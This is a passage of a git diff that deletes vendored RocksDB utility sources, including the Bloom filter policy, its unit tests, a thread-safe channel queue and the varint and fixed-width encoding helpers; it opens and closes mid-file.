-}
-
-inline void FullFilterBitsBuilder::AddHash(uint32_t h, char* data,
-    uint32_t num_lines, uint32_t total_bits) {
-  assert(num_lines > 0 && total_bits > 0);
-
-  const uint32_t delta = (h >> 17) | (h << 15);  // Rotate right 17 bits
-  uint32_t b = (h % num_lines) * (CACHE_LINE_SIZE * 8);
-
-  for (uint32_t i = 0; i < num_probes_; ++i) {
-    // Since CACHE_LINE_SIZE is defined as 2^n, this line will be optimized
-    // to a simple operation by compiler.
-    const uint32_t bitpos = b + (h % (CACHE_LINE_SIZE * 8));
-    data[bitpos / 8] |= (1 << (bitpos % 8));
-
-    h += delta;
-  }
-}
-
-namespace {
-class FullFilterBitsReader : public FilterBitsReader {
- public:
-  explicit FullFilterBitsReader(const Slice& contents)
-      : data_(const_cast<char*>(contents.data())),
-        data_len_(static_cast<uint32_t>(contents.size())),
-        num_probes_(0),
-        num_lines_(0) {
-    assert(data_);
-    GetFilterMeta(contents, &num_probes_, &num_lines_);
-    // Sanitize broken parameter
-    if (num_lines_ != 0 && (data_len_-5) % num_lines_ != 0) {
-      num_lines_ = 0;
-      num_probes_ = 0;
-    }
-  }
-
-  ~FullFilterBitsReader() {}
-
-  virtual bool MayMatch(const Slice& entry) override {
-    if (data_len_ <= 5) {   // remain same with original filter
-      return false;
-    }
-    // Other Error params, including a broken filter, regarded as match
-    if (num_probes_ == 0 || num_lines_ == 0) return true;
-    uint32_t hash = BloomHash(entry);
-    return HashMayMatch(hash, Slice(data_, data_len_),
-                        num_probes_, num_lines_);
-  }
-
- private:
-  // Filter meta data
-  char* data_;
-  uint32_t data_len_;
-  size_t num_probes_;
-  uint32_t num_lines_;
-
-  // Get num_probes, and num_lines from filter
-  // If filter format broken, set both to 0.
-  void GetFilterMeta(const Slice& filter, size_t* num_probes,
-                             uint32_t* num_lines);
-
-  // "filter" contains the data appended by a preceding call to
-  // CreateFilterFromHash() on this class.  This method must return true if
-  // the key was in the list of keys passed to CreateFilter().
-  // This method may return true or false if the key was not on the
-  // list, but it should aim to return false with a high probability.
-  //
-  // hash: target to be checked
-  // filter: the whole filter, including meta data bytes
-  // num_probes: number of probes, read before hand
-  // num_lines: filter metadata, read before hand
-  // Before calling this function, need to ensure the input meta data
-  // is valid.
-  bool HashMayMatch(const uint32_t& hash, const Slice& filter,
-      const size_t& num_probes, const uint32_t& num_lines);
-
-  // No Copy allowed
-  FullFilterBitsReader(const FullFilterBitsReader&);
-  void operator=(const FullFilterBitsReader&);
-};
-
-void FullFilterBitsReader::GetFilterMeta(const Slice& filter,
-    size_t* num_probes, uint32_t* num_lines) {
-  uint32_t len = static_cast<uint32_t>(filter.size());
-  if (len <= 5) {
-    // filter is empty or broken
-    *num_probes = 0;
-    *num_lines = 0;
-    return;
-  }
-
-  *num_probes = filter.data()[len - 5];
-  *num_lines = DecodeFixed32(filter.data() + len - 4);
-}
-
-bool FullFilterBitsReader::HashMayMatch(const uint32_t& hash,
-    const Slice& filter, const size_t& num_probes,
-    const uint32_t& num_lines) {
-  uint32_t len = static_cast<uint32_t>(filter.size());
-  if (len <= 5) return false;  // remain the same with original filter
-
-  // It is ensured the params are valid before calling it
-  assert(num_probes != 0);
-  assert(num_lines != 0 && (len - 5) % num_lines == 0);
-  uint32_t cache_line_size = (len - 5) / num_lines;
-  const char* data = filter.data();
-
-  uint32_t h = hash;
-  const uint32_t delta = (h >> 17) | (h << 15);  // Rotate right 17 bits
-  uint32_t b = (h % num_lines) * (cache_line_size * 8);
-
-  for (uint32_t i = 0; i < num_probes; ++i) {
-    // Since CACHE_LINE_SIZE is defined as 2^n, this line will be optimized
-    //  to a simple and operation by compiler.
-    const uint32_t bitpos = b + (h % (cache_line_size * 8));
-    if (((data[bitpos / 8]) & (1 << (bitpos % 8))) == 0) {
-      return false;
-    }
-
-    h += delta;
-  }
-
-  return true;
-}
-
-// An implementation of filter policy
-class BloomFilterPolicy : public FilterPolicy {
- public:
-  explicit BloomFilterPolicy(int bits_per_key, bool use_block_based_builder)
-      : bits_per_key_(bits_per_key), hash_func_(BloomHash),
-        use_block_based_builder_(use_block_based_builder) {
-    initialize();
-  }
-
-  ~BloomFilterPolicy() {
-  }
-
-  virtual const char* Name() const override {
-    return "rocksdb.BuiltinBloomFilter";
-  }
-
-  virtual void CreateFilter(const Slice* keys, int n,
-                            std::string* dst) const override {
-    // Compute bloom filter size (in both bits and bytes)
-    size_t bits = n * bits_per_key_;
-
-    // For small n, we can see a very high false positive rate.  Fix it
-    // by enforcing a minimum bloom filter length.
-    if (bits < 64) bits = 64;
-
-    size_t bytes = (bits + 7) / 8;
-    bits = bytes * 8;
-
-    const size_t init_size = dst->size();
-    dst->resize(init_size + bytes, 0);
-    dst->push_back(static_cast<char>(num_probes_));  // Remember # of probes
-    char* array = &(*dst)[init_size];
-    for (size_t i = 0; i < (size_t)n; i++) {
-      // Use double-hashing to generate a sequence of hash values.
-      // See analysis in [Kirsch,Mitzenmacher 2006].
-      uint32_t h = hash_func_(keys[i]);
-      const uint32_t delta = (h >> 17) | (h << 15);  // Rotate right 17 bits
-      for (size_t j = 0; j < num_probes_; j++) {
-        const uint32_t bitpos = h % bits;
-        array[bitpos/8] |= (1 << (bitpos % 8));
-        h += delta;
-      }
-    }
-  }
-
-  virtual bool KeyMayMatch(const Slice& key,
-                           const Slice& bloom_filter) const override {
-    const size_t len = bloom_filter.size();
-    if (len < 2) return false;
-
-    const char* array = bloom_filter.data();
-    const size_t bits = (len - 1) * 8;
-
-    // Use the encoded k so that we can read filters generated by
-    // bloom filters created using different parameters.
-    const size_t k = array[len-1];
-    if (k > 30) {
-      // Reserved for potentially new encodings for short bloom filters.
-      // Consider it a match.
-      return true;
-    }
-
-    uint32_t h = hash_func_(key);
-    const uint32_t delta = (h >> 17) | (h << 15);  // Rotate right 17 bits
-    for (size_t j = 0; j < k; j++) {
-      const uint32_t bitpos = h % bits;
-      if ((array[bitpos/8] & (1 << (bitpos % 8))) == 0) return false;
-      h += delta;
-    }
-    return true;
-  }
-
-  virtual FilterBitsBuilder* GetFilterBitsBuilder() const override {
-    if (use_block_based_builder_) {
-      return nullptr;
-    }
-
-    return new FullFilterBitsBuilder(bits_per_key_, num_probes_);
-  }
-
-  virtual FilterBitsReader* GetFilterBitsReader(const Slice& contents)
-      const override {
-    return new FullFilterBitsReader(contents);
-  }
-
-  // If choose to use block based builder
-  bool UseBlockBasedBuilder() { return use_block_based_builder_; }
-
- private:
-  size_t bits_per_key_;
-  size_t num_probes_;
-  uint32_t (*hash_func_)(const Slice& key);
-
-  const bool use_block_based_builder_;
-
-  void initialize() {
-    // We intentionally round down to reduce probing cost a little bit
-    num_probes_ = static_cast<size_t>(bits_per_key_ * 0.69);  // 0.69 =~ ln(2)
-    if (num_probes_ < 1) num_probes_ = 1;
-    if (num_probes_ > 30) num_probes_ = 30;
-  }
-};
-
-}  // namespace
-
-const FilterPolicy* NewBloomFilterPolicy(int bits_per_key,
-                                         bool use_block_based_builder) {
-  return new BloomFilterPolicy(bits_per_key, use_block_based_builder);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/bloom_test.cc b/thirdparty/rocksdb/util/bloom_test.cc
deleted file mode 100644
index 9c32341..0000000
--- a/thirdparty/rocksdb/util/bloom_test.cc
+++ /dev/null
@@ -1,321 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run this test... Skipping...\n");
-  return 0;
-}
-#else
-
-#include <gflags/gflags.h>
-#include <vector>
-
-#include "rocksdb/filter_policy.h"
-#include "table/full_filter_bits_builder.h"
-#include "util/arena.h"
-#include "util/logging.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-using GFLAGS::ParseCommandLineFlags;
-
-DEFINE_int32(bits_per_key, 10, "");
-
-namespace rocksdb {
-
-static const int kVerbose = 1;
-
-static Slice Key(int i, char* buffer) {
-  std::string s;
-  PutFixed32(&s, static_cast<uint32_t>(i));
-  memcpy(buffer, s.c_str(), sizeof(i));
-  return Slice(buffer, sizeof(i));
-}
-
-static int NextLength(int length) {
-  if (length < 10) {
-    length += 1;
-  } else if (length < 100) {
-    length += 10;
-  } else if (length < 1000) {
-    length += 100;
-  } else {
-    length += 1000;
-  }
-  return length;
-}
-
-class BloomTest : public testing::Test {
- private:
-  const FilterPolicy* policy_;
-  std::string filter_;
-  std::vector<std::string> keys_;
-
- public:
-  BloomTest() : policy_(
-      NewBloomFilterPolicy(FLAGS_bits_per_key)) {}
-
-  ~BloomTest() {
-    delete policy_;
-  }
-
-  void Reset() {
-    keys_.clear();
-    filter_.clear();
-  }
-
-  void Add(const Slice& s) {
-    keys_.push_back(s.ToString());
-  }
-
-  void Build() {
-    std::vector<Slice> key_slices;
-    for (size_t i = 0; i < keys_.size(); i++) {
-      key_slices.push_back(Slice(keys_[i]));
-    }
-    filter_.clear();
-    policy_->CreateFilter(&key_slices[0], static_cast<int>(key_slices.size()),
-                          &filter_);
-    keys_.clear();
-    if (kVerbose >= 2) DumpFilter();
-  }
-
-  size_t FilterSize() const {
-    return filter_.size();
-  }
-
-  void DumpFilter() {
-    fprintf(stderr, "F(");
-    for (size_t i = 0; i+1 < filter_.size(); i++) {
-      const unsigned int c = static_cast<unsigned int>(filter_[i]);
-      for (int j = 0; j < 8; j++) {
-        fprintf(stderr, "%c", (c & (1 <<j)) ? '1' : '.');
-      }
-    }
-    fprintf(stderr, ")\n");
-  }
-
-  bool Matches(const Slice& s) {
-    if (!keys_.empty()) {
-      Build();
-    }
-    return policy_->KeyMayMatch(s, filter_);
-  }
-
-  double FalsePositiveRate() {
-    char buffer[sizeof(int)];
-    int result = 0;
-    for (int i = 0; i < 10000; i++) {
-      if (Matches(Key(i + 1000000000, buffer))) {
-        result++;
-      }
-    }
-    return result / 10000.0;
-  }
-};
-
-TEST_F(BloomTest, EmptyFilter) {
-  ASSERT_TRUE(! Matches("hello"));
-  ASSERT_TRUE(! Matches("world"));
-}
-
-TEST_F(BloomTest, Small) {
-  Add("hello");
-  Add("world");
-  ASSERT_TRUE(Matches("hello"));
-  ASSERT_TRUE(Matches("world"));
-  ASSERT_TRUE(! Matches("x"));
-  ASSERT_TRUE(! Matches("foo"));
-}
-
-TEST_F(BloomTest, VaryingLengths) {
-  char buffer[sizeof(int)];
-
-  // Count number of filters that significantly exceed the false positive rate
-  int mediocre_filters = 0;
-  int good_filters = 0;
-
-  for (int length = 1; length <= 10000; length = NextLength(length)) {
-    Reset();
-    for (int i = 0; i < length; i++) {
-      Add(Key(i, buffer));
-    }
-    Build();
-
-    ASSERT_LE(FilterSize(), (size_t)((length * 10 / 8) + 40)) << length;
-
-    // All added keys must match
-    for (int i = 0; i < length; i++) {
-      ASSERT_TRUE(Matches(Key(i, buffer)))
-          << "Length " << length << "; key " << i;
-    }
-
-    // Check false positive rate
-    double rate = FalsePositiveRate();
-    if (kVerbose >= 1) {
-      fprintf(stderr, "False positives: %5.2f%% @ length = %6d ; bytes = %6d\n",
-              rate*100.0, length, static_cast<int>(FilterSize()));
-    }
-    ASSERT_LE(rate, 0.02);   // Must not be over 2%
-    if (rate > 0.0125) mediocre_filters++;  // Allowed, but not too often
-    else good_filters++;
-  }
-  if (kVerbose >= 1) {
-    fprintf(stderr, "Filters: %d good, %d mediocre\n",
-            good_filters, mediocre_filters);
-  }
-  ASSERT_LE(mediocre_filters, good_filters/5);
-}
-
-// Different bits-per-byte
-
-class FullBloomTest : public testing::Test {
- private:
-  const FilterPolicy* policy_;
-  std::unique_ptr<FilterBitsBuilder> bits_builder_;
-  std::unique_ptr<FilterBitsReader> bits_reader_;
-  std::unique_ptr<const char[]> buf_;
-  size_t filter_size_;
-
- public:
-  FullBloomTest() :
-      policy_(NewBloomFilterPolicy(FLAGS_bits_per_key, false)),
-      filter_size_(0) {
-    Reset();
-  }
-
-  ~FullBloomTest() {
-    delete policy_;
-  }
-
-  FullFilterBitsBuilder* GetFullFilterBitsBuilder() {
-    return dynamic_cast<FullFilterBitsBuilder*>(bits_builder_.get());
-  }
-
-  void Reset() {
-    bits_builder_.reset(policy_->GetFilterBitsBuilder());
-    bits_reader_.reset(nullptr);
-    buf_.reset(nullptr);
-    filter_size_ = 0;
-  }
-
-  void Add(const Slice& s) {
-    bits_builder_->AddKey(s);
-  }
-
-  void Build() {
-    Slice filter = bits_builder_->Finish(&buf_);
-    bits_reader_.reset(policy_->GetFilterBitsReader(filter));
-    filter_size_ = filter.size();
-  }
-
-  size_t FilterSize() const {
-    return filter_size_;
-  }
-
-  bool Matches(const Slice& s) {
-    if (bits_reader_ == nullptr) {
-      Build();
-    }
-    return bits_reader_->MayMatch(s);
-  }
-
-  double FalsePositiveRate() {
-    char buffer[sizeof(int)];
-    int result = 0;
-    for (int i = 0; i < 10000; i++) {
-      if (Matches(Key(i + 1000000000, buffer))) {
-        result++;
-      }
-    }
-    return result / 10000.0;
-  }
-};
-
-TEST_F(FullBloomTest, FilterSize) {
-  uint32_t dont_care1, dont_care2;
-  auto full_bits_builder = GetFullFilterBitsBuilder();
-  for (int n = 1; n < 100; n++) {
-    auto space = full_bits_builder->CalculateSpace(n, &dont_care1, &dont_care2);
-    auto n2 = full_bits_builder->CalculateNumEntry(space);
-    ASSERT_GE(n2, n);
-    auto space2 =
-        full_bits_builder->CalculateSpace(n2, &dont_care1, &dont_care2);
-    ASSERT_EQ(space, space2);
-  }
-}
-
-TEST_F(FullBloomTest, FullEmptyFilter) {
-  // Empty filter is not match, at this level
-  ASSERT_TRUE(!Matches("hello"));
-  ASSERT_TRUE(!Matches("world"));
-}
-
-TEST_F(FullBloomTest, FullSmall) {
-  Add("hello");
-  Add("world");
-  ASSERT_TRUE(Matches("hello"));
-  ASSERT_TRUE(Matches("world"));
-  ASSERT_TRUE(!Matches("x"));
-  ASSERT_TRUE(!Matches("foo"));
-}
-
-TEST_F(FullBloomTest, FullVaryingLengths) {
-  char buffer[sizeof(int)];
-
-  // Count number of filters that significantly exceed the false positive rate
-  int mediocre_filters = 0;
-  int good_filters = 0;
-
-  for (int length = 1; length <= 10000; length = NextLength(length)) {
-    Reset();
-    for (int i = 0; i < length; i++) {
-      Add(Key(i, buffer));
-    }
-    Build();
-
-    ASSERT_LE(FilterSize(), (size_t)((length * 10 / 8) + 128 + 5)) << length;
-
-    // All added keys must match
-    for (int i = 0; i < length; i++) {
-      ASSERT_TRUE(Matches(Key(i, buffer)))
-          << "Length " << length << "; key " << i;
-    }
-
-    // Check false positive rate
-    double rate = FalsePositiveRate();
-    if (kVerbose >= 1) {
-      fprintf(stderr, "False positives: %5.2f%% @ length = %6d ; bytes = %6d\n",
-              rate*100.0, length, static_cast<int>(FilterSize()));
-    }
-    ASSERT_LE(rate, 0.02);   // Must not be over 2%
-    if (rate > 0.0125)
-      mediocre_filters++;  // Allowed, but not too often
-    else
-      good_filters++;
-  }
-  if (kVerbose >= 1) {
-    fprintf(stderr, "Filters: %d good, %d mediocre\n",
-            good_filters, mediocre_filters);
-  }
-  ASSERT_LE(mediocre_filters, good_filters/5);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  ParseCommandLineFlags(&argc, &argv, true);
-
-  return RUN_ALL_TESTS();
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/util/build_version.cc.in b/thirdparty/rocksdb/util/build_version.cc.in
deleted file mode 100644
index d2e8c57..0000000
--- a/thirdparty/rocksdb/util/build_version.cc.in
+++ /dev/null
@@ -1,4 +0,0 @@
-#include "build_version.h"
-const char* rocksdb_build_git_sha = "rocksdb_build_git_sha:@@GIT_SHA@@";
-const char* rocksdb_build_git_date = "rocksdb_build_git_date:@@GIT_DATE_TIME@@";
-const char* rocksdb_build_compile_date = __DATE__;
diff --git a/thirdparty/rocksdb/util/build_version.h b/thirdparty/rocksdb/util/build_version.h
deleted file mode 100644
index 36ff92c..0000000
--- a/thirdparty/rocksdb/util/build_version.h
+++ /dev/null
@@ -1,15 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#if !defined(IOS_CROSS_COMPILE)
-// if we compile with Xcode, we don't run build_detect_version, so we don't
-// generate these variables
-// this variable tells us about the git revision
-extern const char* rocksdb_build_git_sha;
-
-// Date on which the code was compiled:
-extern const char* rocksdb_build_compile_date;
-#endif
diff --git a/thirdparty/rocksdb/util/cast_util.h b/thirdparty/rocksdb/util/cast_util.h
deleted file mode 100644
index 2dc8138..0000000
--- a/thirdparty/rocksdb/util/cast_util.h
+++ /dev/null
@@ -1,21 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-namespace rocksdb {
-// The helper function to assert the move from dynamic_cast<> to
-// static_cast<> is correct. This function is to deal with legacy code.
-// It is not recommanded to add new code to issue class casting. The preferred
-// solution is to implement the functionality without a need of casting.
-template <class DestClass, class SrcClass>
-inline DestClass* static_cast_with_check(SrcClass* x) {
-  DestClass* ret = static_cast<DestClass*>(x);
-#ifdef ROCKSDB_USE_RTTI
-  assert(ret == dynamic_cast<DestClass*>(x));
-#endif
-  return ret;
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/channel.h b/thirdparty/rocksdb/util/channel.h
deleted file mode 100644
index 1b03019..0000000
--- a/thirdparty/rocksdb/util/channel.h
+++ /dev/null
@@ -1,67 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <condition_variable>
-#include <mutex>
-#include <queue>
-#include <utility>
-
-#pragma once
-
-namespace rocksdb {
-
-template <class T>
-class channel {
- public:
-  explicit channel() : eof_(false) {}
-
-  channel(const channel&) = delete;
-  void operator=(const channel&) = delete;
-
-  void sendEof() {
-    std::lock_guard<std::mutex> lk(lock_);
-    eof_ = true;
-    cv_.notify_all();
-  }
-
-  bool eof() {
-    std::lock_guard<std::mutex> lk(lock_);
-    return buffer_.empty() && eof_;
-  }
-
-  size_t size() const {
-    std::lock_guard<std::mutex> lk(lock_);
-    return buffer_.size();
-  }
-
-  // writes elem to the queue
-  void write(T&& elem) {
-    std::unique_lock<std::mutex> lk(lock_);
-    buffer_.emplace(std::forward<T>(elem));
-    cv_.notify_one();
-  }
-
-  /// Moves a dequeued element onto elem, blocking until an element
-  /// is available.
-  // returns false if EOF
-  bool read(T& elem) {
-    std::unique_lock<std::mutex> lk(lock_);
-    cv_.wait(lk, [&] { return eof_ || !buffer_.empty(); });
-    if (eof_ && buffer_.empty()) {
-      return false;
-    }
-    elem = std::move(buffer_.front());
-    buffer_.pop();
-    cv_.notify_one();
-    return true;
-  }
-
- private:
-  std::condition_variable cv_;
-  std::mutex lock_;
-  std::queue<T> buffer_;
-  bool eof_;
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/coding.cc b/thirdparty/rocksdb/util/coding.cc
deleted file mode 100644
index 3b58e3f..0000000
--- a/thirdparty/rocksdb/util/coding.cc
+++ /dev/null
@@ -1,81 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/coding.h"
-
-#include <algorithm>
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-
-namespace rocksdb {
-
-char* EncodeVarint32(char* dst, uint32_t v) {
-  // Operate on characters as unsigneds
-  unsigned char* ptr = reinterpret_cast<unsigned char*>(dst);
-  static const int B = 128;
-  if (v < (1 << 7)) {
-    *(ptr++) = v;
-  } else if (v < (1 << 14)) {
-    *(ptr++) = v | B;
-    *(ptr++) = v >> 7;
-  } else if (v < (1 << 21)) {
-    *(ptr++) = v | B;
-    *(ptr++) = (v >> 7) | B;
-    *(ptr++) = v >> 14;
-  } else if (v < (1 << 28)) {
-    *(ptr++) = v | B;
-    *(ptr++) = (v >> 7) | B;
-    *(ptr++) = (v >> 14) | B;
-    *(ptr++) = v >> 21;
-  } else {
-    *(ptr++) = v | B;
-    *(ptr++) = (v >> 7) | B;
-    *(ptr++) = (v >> 14) | B;
-    *(ptr++) = (v >> 21) | B;
-    *(ptr++) = v >> 28;
-  }
-  return reinterpret_cast<char*>(ptr);
-}
-
-const char* GetVarint32PtrFallback(const char* p, const char* limit,
-                                   uint32_t* value) {
-  uint32_t result = 0;
-  for (uint32_t shift = 0; shift <= 28 && p < limit; shift += 7) {
-    uint32_t byte = *(reinterpret_cast<const unsigned char*>(p));
-    p++;
-    if (byte & 128) {
-      // More bytes are present
-      result |= ((byte & 127) << shift);
-    } else {
-      result |= (byte << shift);
-      *value = result;
-      return reinterpret_cast<const char*>(p);
-    }
-  }
-  return nullptr;
-}
-
-const char* GetVarint64Ptr(const char* p, const char* limit, uint64_t* value) {
-  uint64_t result = 0;
-  for (uint32_t shift = 0; shift <= 63 && p < limit; shift += 7) {
-    uint64_t byte = *(reinterpret_cast<const unsigned char*>(p));
-    p++;
-    if (byte & 128) {
-      // More bytes are present
-      result |= ((byte & 127) << shift);
-    } else {
-      result |= (byte << shift);
-      *value = result;
-      return reinterpret_cast<const char*>(p);
-    }
-  }
-  return nullptr;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/coding.h b/thirdparty/rocksdb/util/coding.h
deleted file mode 100644
index 5cf0094..0000000
--- a/thirdparty/rocksdb/util/coding.h
+++ /dev/null
@@ -1,388 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Endian-neutral encoding:
-// * Fixed-length numbers are encoded with least-significant byte first
-// * In addition we support variable length "varint" encoding
-// * Strings are encoded prefixed by their length in varint format
-
-#pragma once
-#include <algorithm>
-#include <stdint.h>
-#include <string.h>
-#include <string>
-
-#include "rocksdb/write_batch.h"
-#include "port/port.h"
-
-// Some processors does not allow unaligned access to memory
-#if defined(__sparc)
-  #define PLATFORM_UNALIGNED_ACCESS_NOT_ALLOWED
-#endif
-
-namespace rocksdb {
-
-// The maximum length of a varint in bytes for 64-bit.
-const unsigned int kMaxVarint64Length = 10;
-
-// Standard Put... routines append to a string
-extern void PutFixed32(std::string* dst, uint32_t value);
-extern void PutFixed64(std::string* dst, uint64_t value);
-extern void PutVarint32(std::string* dst, uint32_t value);
-extern void PutVarint32Varint32(std::string* dst, uint32_t value1,
-                                uint32_t value2);
-extern void PutVarint32Varint32Varint32(std::string* dst, uint32_t value1,
-                                        uint32_t value2, uint32_t value3);
-extern void PutVarint64(std::string* dst, uint64_t value);
-extern void PutVarint64Varint64(std::string* dst, uint64_t value1,
-                                uint64_t value2);
-extern void PutVarint32Varint64(std::string* dst, uint32_t value1,
-                                uint64_t value2);
-extern void PutVarint32Varint32Varint64(std::string* dst, uint32_t value1,
-                                        uint32_t value2, uint64_t value3);
-extern void PutLengthPrefixedSlice(std::string* dst, const Slice& value);
-extern void PutLengthPrefixedSliceParts(std::string* dst,
-                                        const SliceParts& slice_parts);
-
-// Standard Get... routines parse a value from the beginning of a Slice
-// and advance the slice past the parsed value.
-extern bool GetFixed64(Slice* input, uint64_t* value);
-extern bool GetFixed32(Slice* input, uint32_t* value);
-extern bool GetVarint32(Slice* input, uint32_t* value);
-extern bool GetVarint64(Slice* input, uint64_t* value);
-extern bool GetLengthPrefixedSlice(Slice* input, Slice* result);
-// This function assumes data is well-formed.
-extern Slice GetLengthPrefixedSlice(const char* data);
-
-extern Slice GetSliceUntil(Slice* slice, char delimiter);
-
-// Pointer-based variants of GetVarint...  These either store a value
-// in *v and return a pointer just past the parsed value, or return
-// nullptr on error.  These routines only look at bytes in the range
-// [p..limit-1]
-extern const char* GetVarint32Ptr(const char* p,const char* limit, uint32_t* v);
-extern const char* GetVarint64Ptr(const char* p,const char* limit, uint64_t* v);
-
-// Returns the length of the varint32 or varint64 encoding of "v"
-extern int VarintLength(uint64_t v);
-
-// Lower-level versions of Put... that write directly into a character buffer
-// REQUIRES: dst has enough space for the value being written
-extern void EncodeFixed32(char* dst, uint32_t value);
-extern void EncodeFixed64(char* dst, uint64_t value);
-
-// Lower-level versions of Put... that write directly into a character buffer
-// and return a pointer just past the last byte written.
-// REQUIRES: dst has enough space for the value being written
-extern char* EncodeVarint32(char* dst, uint32_t value);
-extern char* EncodeVarint64(char* dst, uint64_t value);
-
-// Lower-level versions of Get... that read directly from a character buffer
-// without any bounds checking.
-
-inline uint32_t DecodeFixed32(const char* ptr) {
-  if (port::kLittleEndian) {
-    // Load the raw bytes
-    uint32_t result;
-    memcpy(&result, ptr, sizeof(result));  // gcc optimizes this to a plain load
-    return result;
-  } else {
-    return ((static_cast<uint32_t>(static_cast<unsigned char>(ptr[0])))
-        | (static_cast<uint32_t>(static_cast<unsigned char>(ptr[1])) << 8)
-        | (static_cast<uint32_t>(static_cast<unsigned char>(ptr[2])) << 16)
-        | (static_cast<uint32_t>(static_cast<unsigned char>(ptr[3])) << 24));
-  }
-}
-
-inline uint64_t DecodeFixed64(const char* ptr) {
-  if (port::kLittleEndian) {
-    // Load the raw bytes
-    uint64_t result;
-    memcpy(&result, ptr, sizeof(result));  // gcc optimizes this to a plain load
-    return result;
-  } else {
-    uint64_t lo = DecodeFixed32(ptr);
-    uint64_t hi = DecodeFixed32(ptr + 4);
-    return (hi << 32) | lo;
-  }
-}
-
-// Internal routine for use by fallback path of GetVarint32Ptr
-extern const char* GetVarint32PtrFallback(const char* p,
-                                          const char* limit,
-                                          uint32_t* value);
-inline const char* GetVarint32Ptr(const char* p,
-                                  const char* limit,
-                                  uint32_t* value) {
-  if (p < limit) {
-    uint32_t result = *(reinterpret_cast<const unsigned char*>(p));
-    if ((result & 128) == 0) {
-      *value = result;
-      return p + 1;
-    }
-  }
-  return GetVarint32PtrFallback(p, limit, value);
-}
-
-// -- Implementation of the functions declared above
-inline void EncodeFixed32(char* buf, uint32_t value) {
-  if (port::kLittleEndian) {
-    memcpy(buf, &value, sizeof(value));
-  } else {
-    buf[0] = value & 0xff;
-    buf[1] = (value >> 8) & 0xff;
-    buf[2] = (value >> 16) & 0xff;
-    buf[3] = (value >> 24) & 0xff;
-  }
-}
-
-inline void EncodeFixed64(char* buf, uint64_t value) {
-  if (port::kLittleEndian) {
-    memcpy(buf, &value, sizeof(value));
-  } else {
-    buf[0] = value & 0xff;
-    buf[1] = (value >> 8) & 0xff;
-    buf[2] = (value >> 16) & 0xff;
-    buf[3] = (value >> 24) & 0xff;
-    buf[4] = (value >> 32) & 0xff;
-    buf[5] = (value >> 40) & 0xff;
-    buf[6] = (value >> 48) & 0xff;
-    buf[7] = (value >> 56) & 0xff;
-  }
-}
-
-// Pull the last 8 bits and cast it to a character
-inline void PutFixed32(std::string* dst, uint32_t value) {
-  if (port::kLittleEndian) {
-    dst->append(const_cast<const char*>(reinterpret_cast<char*>(&value)),
-      sizeof(value));
-  } else {
-    char buf[sizeof(value)];
-    EncodeFixed32(buf, value);
-    dst->append(buf, sizeof(buf));
-  }
-}
-
-inline void PutFixed64(std::string* dst, uint64_t value) {
-  if (port::kLittleEndian) {
-    dst->append(const_cast<const char*>(reinterpret_cast<char*>(&value)),
-      sizeof(value));
-  } else {
-    char buf[sizeof(value)];
-    EncodeFixed64(buf, value);
-    dst->append(buf, sizeof(buf));
-  }
-}
-
-inline void PutVarint32(std::string* dst, uint32_t v) {
-  char buf[5];
-  char* ptr = EncodeVarint32(buf, v);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline void PutVarint32Varint32(std::string* dst, uint32_t v1, uint32_t v2) {
-  char buf[10];
-  char* ptr = EncodeVarint32(buf, v1);
-  ptr = EncodeVarint32(ptr, v2);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline void PutVarint32Varint32Varint32(std::string* dst, uint32_t v1,
-                                        uint32_t v2, uint32_t v3) {
-  char buf[15];
-  char* ptr = EncodeVarint32(buf, v1);
-  ptr = EncodeVarint32(ptr, v2);
-  ptr = EncodeVarint32(ptr, v3);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline char* EncodeVarint64(char* dst, uint64_t v) {
-  static const unsigned int B = 128;
-  unsigned char* ptr = reinterpret_cast<unsigned char*>(dst);
-  while (v >= B) {
-    *(ptr++) = (v & (B - 1)) | B;
-    v >>= 7;
-  }
-  *(ptr++) = static_cast<unsigned char>(v);
